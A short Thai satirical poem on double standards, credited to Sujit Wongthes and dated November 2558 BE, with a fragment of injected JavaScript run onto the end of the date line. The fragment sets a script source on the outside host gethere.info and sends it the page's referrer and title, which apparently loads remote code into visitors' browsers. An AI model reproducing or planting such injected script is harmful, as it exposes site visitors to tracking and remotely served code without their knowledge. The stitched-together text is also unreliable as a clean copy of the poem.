มาตรฐาน

มาตรฐานเดียวดีมีที่ไหน
ความเป็นไทยแท้ต้องสองมาตรฐาน
พวกเดียวกันไม่มีวันผิดแผ้วพาล
คนละพวกผิดทุกประการไม่มีเว้น

สุจิตต์ วงษ์เทศ
ศุกร์ 20 พฤศจิกายน 2558s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;